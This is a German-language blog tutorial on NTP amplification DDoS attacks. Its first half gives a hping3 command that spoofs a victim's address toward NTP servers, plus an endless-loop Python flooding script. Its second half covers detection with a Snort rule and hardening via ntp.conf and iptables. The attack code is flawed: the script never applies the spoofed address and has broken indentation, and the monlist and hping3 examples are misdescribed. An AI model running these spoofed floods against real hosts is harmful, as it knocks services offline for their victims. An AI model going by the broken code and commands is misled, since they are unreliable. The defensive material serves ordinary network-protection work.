💭 Jeremys Brain

NTP-Amplification

6 min read

NTP Amplification (Verstärkungsangriffe)

Einführung

NTP Amplification ist eine raffinierte Form von Distributed Denial of Service (DDoS)-Angriff, bei der Network Time Protocol (NTP)-Server missbraucht werden, um den Datenverkehr zu einem Ziel zu verstärken und dieses zu überfluten. Solche Angriffe können massive Ausfallzeiten verursachen und die Verfügbarkeit von Diensten erheblich beeinträchtigen. In diesem Blogbeitrag werden wir den NTP Amplification-Angriff detailliert analysieren, einschließlich der zugrunde liegenden Mechanismen, spezifischer Befehle und potenzieller Skripte, die Angreifer verwenden könnten.

Hinweis: Die Informationen in diesem Beitrag dienen ausschließlich zu Bildungszwecken. Jeglicher Missbrauch dieser Techniken ist illegal und ethisch verwerflich.

Was ist NTP?

Das Network Time Protocol (NTP) ist ein Netzwerkprotokoll zur Synchronisierung der Uhren zwischen Computersystemen über paketvermittelte, variabel verzögernde Datennetzwerke. NTP ist eines der ältesten Internetprotokolle und essenziell für die genaue Zeitmessung in Netzwerken, was für viele sicherheitsrelevante Prozesse unerlässlich ist.

Funktionsweise von NTP Amplification

Ein NTP Amplification-Angriff nutzt die Tatsache aus, dass bestimmte NTP-Anfragen eine überproportionale Antwort generieren können. Dies geschieht in mehreren Schritten:

1. Reflexion

Der Angreifer sendet eine große Anzahl von NTP-Anfragen an öffentlich zugängliche NTP-Server, wobei die Quell-IP-Adresse jeder Anfrage auf die IP-Adresse des Opfers gefälscht ist (IP-Spoofing). Dadurch erscheint es, als ob das Opfer die Anfragen gestellt hat.

Beispiel eines gefälschten NTP-Anfragebefehls:

Beispielbefehl mit hping3 zur Generierung von NTP-Anfragen mit gefälschter

hping3 -2 -c 10000 -d 120 -S -w 64 -p 123 --spoof <Opfer-IP> <NTP-Server-IP>

Erläuterung der Parameter:

  • -2: UDP-Protokoll
  • -c 10000: Anzahl der Pakete
  • -d 120: Größe des Datenpakets
  • -S: SYN-Flag setzen (bei UDP nicht zwingend nötig, hier nur als Beispiel)
  • -w 64: Fenstergröße
  • -p 123: Zielport 123 (NTP)
  • --spoof <Opfer-IP>: Fälschen der Quell-IP-Adresse auf die des Opfers
  • <NTP-Server-IP>: Ziel-NTP-Server

Warnung: Das Ausführen solcher Befehle ohne ausdrückliche Genehmigung ist illegal und strafbar.

2. Verstärkung

NTP-Server reagieren auf bestimmte Anfragen mit Antworten, die deutlich größer sind als die ursprünglichen Anfragen. Ein häufig genutzter Befehl hierfür ist monlist, der eine Liste der letzten 600 Verbindungen zurückgibt.

Beispiel einer monlist-Anfrage mit ntpdate:

ntpdate -q <NTP-Server-IP> | grep monlist`

Antwort des NTP-Servers:

Die Antwort auf eine monlist-Anfrage kann mehrere Kilobytes groß sein, wodurch der ursprüngliche Datenverkehr um das 50- bis 100-fache verstärkt wird.

3. Überflutung

Durch das Versenden einer großen Anzahl gefälschter Anfragen an viele NTP-Server kann der Angreifer eine enorme Menge an Datenverkehr erzeugen, der zum Opfer geleitet wird. Dies führt zu einer Überlastung der Netzwerkressourcen des Opfers und kann zu erheblichen Dienstunterbrechungen führen.

Beispiel eines einfachen Skripts zur Durchführung eines NTP Amplification-Angriffs:

# **Warnung:** Dieses Skript dient nur zu Bildungszwecken und darf nicht für illegale Aktivitäten verwendet werden.  
import socket 
import random  
def send_ntp_request(target_ip, target_port, spoofed_ip):     
	client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	client.settimeout(1)          # NTP Request Packet     
	data = b'\x17\x00\x03\x2a' + 28 * b'\0'          
	try:         
		client.sendto(data, (target_ip, target_port))     
	except Exception as e:         
		print(f"Error sending packet: {e}")     
		finally:         
			client.close()  
def main():     
	target_ip = "192.0.2.1"  # Opfer-IP     
	target_port = 123     
	spoofed_ip = "198.51.100.1"  # Gefälschte Quell-IP          
	while True:         
		send_ntp_request(target_ip, target_port, spoofed_ip)
		print(f"Sent NTP request to {target_ip}")  
		
if __name__ == "__main__":     
	main()`

Erläuterung:

  • Das Skript erstellt eine einfache NTP-Anfrage und sendet sie an den Ziel-NTP-Server mit einer gefälschten Quell-IP-Adresse.
  • Es verwendet UDP, da NTP auf UDP-Port 123 arbeitet.
  • Wiederholte Ausführung führt zu einer massiven Überflutung des Opfers.

Warnung: Die Nutzung dieses Skripts für einen tatsächlichen Angriff ist illegal und strafbar.

Auswirkungen von NTP Amplification-Angriffen

  • Bandbreitenüberlastung: Der übermäßige Datenverkehr kann die verfügbare Bandbreite des Opfers erschöpfen.
  • Dienstunterbrechung: Legitimer Datenverkehr wird blockiert, was zu Ausfallzeiten führt.
  • Netzwerkinstabilität: Die erhöhte Last kann nicht nur das Ziel, sondern auch Zwischenknoten beeinträchtigen.

Erkennung von NTP Amplification-Angriffen

Netzwerk-Traffic-Monitoring

  • Anomalieerkennung: Überwachung auf ungewöhnlich hohen eingehenden UDP-Port-123-Verkehr. Tools wie Wireshark oder spezialisierte IDS/IPS-Systeme (z.B. Snort) können hierfür eingesetzt werden.

    Beispiel einer Snort-Regel zur Erkennung von monlist-Anfragen:

alert udp any any -> any 123 (msg:"Possible NTP Amplification Attack"; content:"|17 00 03 2a|"; sid:1000001; rev:1;)`
  • Netzwerk-Flow-Analyse: Verwendung von Tools wie NetFlow oder sFlow zur Analyse des Datenverkehrs und Identifikation ungewöhnlicher Muster.

Log-Analyse

Überwachung der NTP-Server-Logs auf ungewöhnliche Aktivitäten, wie eine hohe Anzahl von Anfragen von einer einzelnen Quelle oder Anfragen, die den monlist-Befehl enthalten.

Gegenmaßnahmen

Absicherung von NTP-Servern

Deaktivieren von unsicheren Befehlen

Der monlist-Befehl ist eine der Hauptursachen für Verstärkungsangriffe und sollte deaktiviert werden.

Beispiel zur Deaktivierung von monlist in der ntp.conf-Datei:

# In der ntp.conf-Datei hinzufügen 
disable monitor

Verwendung sicherer NTP-Versionen

Stellen Sie sicher, dass die NTP-Software auf die neueste Version aktualisiert ist, da neuere Versionen sicherer konfiguriert sind und bekannte Schwachstellen gepatcht wurden.

Beispiel für die Aktualisierung von NTP auf Ubuntu/Debian:

sudo apt-get update 
sudo apt-get install ntp

Einsatz von Access Control Lists (ACLs)

Beschränken Sie den Zugriff auf NTP-Server, indem Sie nur vertrauenswürdige IP-Adressen zulassen.

Beispiel in ntp.conf:

restrict default noquery nomodify notrap nopeer noresolve 
restrict 127.0.0.1 
restrict 192.0.2.0 mask 255.255.255.0

Erläuterung:

  • restrict default noquery nomodify notrap nopeer noresolve: Standardbeschränkungen für alle nicht explizit erlaubten IPs.
  • restrict 127.0.0.1: Erlaubt uneingeschränkten Zugriff von localhost.
  • restrict 192.0.2.0 mask 255.255.255.0: Erlaubt Zugriff nur von einem vertrauenswürdigen Netzwerkbereich.

Implementierung von Rate Limiting

Verwenden Sie Netzwerkgeräte wie Router und Firewalls, um die Rate der eingehenden NTP-Anfragen zu begrenzen.

Beispiel mit iptables:

 
# Limitieren auf 10 Anfragen pro Sekunde und begrenzen auf insgesamt 100 Anfragen pro Minute 
 
iptables -A INPUT -p udp --dport 123 -m limit --limit 10/second --limit-burst 100 -j ACCEPT 
 
iptables -A INPUT -p udp --dport 123 -j DROP`

Erläuterung:

  • -m limit --limit 10/second --limit-burst 100: Erlaubt maximal 10 Pakete pro Sekunde mit einem Burst von bis zu 100 Paketen.
  • Alle weiteren Pakete werden verworfen (DROP).

Einsatz von Anti-DDoS-Diensten

Cloud-basierte Anti-DDoS-Dienste wie Cloudflare, Akamai oder Arbor Networks können helfen, DDoS-Angriffe abzuwehren, indem sie den Datenverkehr filtern und nur legitimen Verkehr zum Ziel weiterleiten.

Tools und Befehle

Überprüfung des NTP-Serverstatus

ntpq ist ein nützliches Tool zur Überwachung von NTP.

Beispiel:

ntpq -p

Erläuterung:

  • Zeigt die Peers an, mit denen der NTP-Server synchronisiert ist.

Scannen nach verwundbaren NTP-Servern

Netzwerk-Administratoren können Tools wie Nmap verwenden, um anfällige NTP-Server im Netzwerk zu identifizieren.

Beispiel:

nmap -sU -p123 --script=ntp-monlist <Ziel-IP-Bereich>

Erläuterung:

  • -sU: UDP-Scan
  • -p123: Scannen des NTP-Ports
  • --script=ntp-monlist: Verwenden des Nmap-Skripts zur Abfrage des monlist-Befehls

Aktualisierung von NTP-Servern

Auf Unix/Linux-Systemen kann NTP mit Paketmanagern aktualisiert werden, um sicherzustellen, dass alle Sicherheitsupdates angewendet werden.

Beispiel für Ubuntu/Debian:

sudo apt-get update sudo apt-get install ntp

Zusammenfassung

NTP Amplification-Angriffe stellen eine erhebliche Bedrohung für die Netzwerksicherheit dar, da sie es Angreifern ermöglichen, mit minimalem Aufwand große Datenmengen gegen ein Ziel zu richten. Durch angemessene Konfiguration und Absicherung von NTP-Servern, das Deaktivieren unsicherer Befehle wie monlist, die Implementierung von Access Control Lists (ACLs) und Rate Limiting sowie den Einsatz von Anti-DDoS-Maßnahmen können solche Angriffe effektiv abgewehrt werden. Netzwerkadministratoren sollten regelmäßig ihre Systeme überprüfen und sicherstellen, dass alle Sicherheitsrichtlinien eingehalten werden, um die Widerstandsfähigkeit gegen DDoS-Angriffe zu erhöhen.

NetzwerksicherheitNTPDDoSCybersecurityVerstärkungsangriffe

Network-Attacks-Overview

Graph View